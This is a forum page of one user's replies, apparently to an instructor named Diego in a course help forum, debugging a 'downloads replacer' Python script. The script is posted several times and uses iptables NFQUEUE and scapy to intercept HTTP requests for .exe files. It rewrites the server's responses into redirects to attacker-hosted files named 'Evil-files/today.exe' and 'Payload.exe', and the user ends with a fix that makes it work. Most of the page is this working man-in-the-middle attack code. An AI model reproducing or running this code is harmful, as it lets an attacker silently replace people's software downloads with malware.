Forum Replies Created

Viewing 8 posts - 1 through 8 (of 8 total)
  • Author
    Posts
  • June 13, 2020 at 10:53 am in reply to: downloads re-placer not running #39861
    Alastair
    Participant

    Good morning Diego

    after a bit of googling i found a solution:

    replace – if scapy_packet.haslayer(scapy.Raw):
    with – if scapy.Raw in scapy_packet and scapy.TCP in scapy_packet:

    works absolutely fine now. thanks for all your assistance

    June 12, 2020 at 9:01 am in reply to: downloads re-placer not running #39749
    Alastair
    Participant

    hello Diego,

    #!/usr/bin/env python

# run >> iptables -I FORWARD -j NFQUEUE --queue-num 0
# run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0
# run >> iptables -I INPUT -j NFQUEUE --queue-num 0
# reset with >> iptables --flush

import netfilterqueue
import scapy.all as scapy

ack_list = []

def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == 80:
            if ".exe" in scapy_packet[scapy.Raw].load:
                print("[+] exe Request")
                ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport == 80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("[+] Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.1.46/Files/Payload.exe\n\n")

                packet.set_payload(str(modified_packet))

    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()

    link to screenshot:

    https://1drv.ms/u/s!Amebr6-UtXCwjD4SQTE2wZsrwdwv

    thanks

    June 11, 2020 at 10:07 am in reply to: downloads re-placer not running #39660
    Alastair
    Participant

    hello Diego,

    I’ve corrected the code however it still runs with the same error as before:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    I’ve also noticed that when i run :
    iptables -I OUTPUT -j NFQUEUE –queue-num 0
    iptables -I INPUT -j NFQUEUE –queue-num 0

    I lose my internet connection and nothing loads

    June 8, 2020 at 11:08 am in reply to: downloads re-placer not running #39401
    Alastair
    Participant

    good morning,

    unfortunately running it against the suggested website had no effect. once i run the two commands for iptables (input,output) and then run the downloads replacer via python my screen just fills up with repeated error maessages:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    I also lose internet connection, i have run the echo 1 …. command but this has no effect

    June 4, 2020 at 9:19 am in reply to: downloads re-placer not running #39009
    Alastair
    Participant

    If this help i get this error when i try and run the programme:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    June 4, 2020 at 8:53 am in reply to: downloads re-placer not running #39007
    Alastair
    Participant

    3rd time lucky. sorry i was getting muddled, my code injector programme isnt responding either and i used bing for that one. i have tried the downloads replacer on winzip

    #!/usr/bin/env python

# run >> iptables -I FORWARD -j NFQUEUE --queue-num 0
# run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0
# run >> iptables -I INPUT -j NFQUEUE --queue-num 0
# reset with >> iptables --flush

import netfilterqueue
import scapy.all as scapy

ack_list = []

def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == 80:
            if ".exe" in scapy_packet[scapy.Raw].load:
                print("[+] exe Request")
                ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport == 80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy[scapy.TCP].seq)
                print("[+] Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n")

                packet.set_payload(str(modified_packet))

    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
    June 3, 2020 at 8:18 am in reply to: downloads re-placer not running #38929
    Alastair
    Participant

    apologies, hope this is better. I was using bing.com via firefox

    `#!/usr/bin/env python

    # run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE –queue-num 0
    # reset with >> iptables –flush

    import netfilterqueue
    import scapy.all as scapy

    ack_list = []

    def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

    def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
    if scapy_packet[scapy.TCP].dport == 80:
    if “.exe” in scapy_packet[scapy.Raw].load:
    print(“[+] exe Request”)
    ack_list.append(scapy_packet[scapy.TCP].ack)
    elif scapy_packet[scapy.TCP].sport == 80:
    if scapy_packet[scapy.TCP].seq in ack_list:
    ack_list.remove(scapy[scapy.TCP].seq)
    print(“[+] Replacing file”)
    modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)

    packet.set_payload(str(modified_packet))

    packet.accept()

    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    June 2, 2020 at 8:44 am in reply to: downloads re-placer not running #38829
    Alastair
    Participant

    hello Diego, here is my code. i used the output and input rules for local machine and the forward rule for the windows vm

    #!/usr/bin/env python

    # run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE –queue-num 0
    # reset with >> iptables –flush

    import netfilterqueue
    import scapy.all as scapy

    ack_list = []

    def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

    def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
    if scapy_packet[scapy.TCP].dport == 80:
    if “.exe” in scapy_packet[scapy.Raw].load:
    print(“[+] exe Request”)
    ack_list.append(scapy_packet[scapy.TCP].ack)
    elif scapy_packet[scapy.TCP].sport == 80:
    if scapy_packet[scapy.TCP].seq in ack_list:
    ack_list.remove(scapy[scapy.TCP].seq)
    print(“[+] Replacing file”)
    modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)

    packet.set_payload(str(modified_packet))

    packet.accept()

    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

  • Author
    Posts
Viewing 8 posts - 1 through 8 (of 8 total)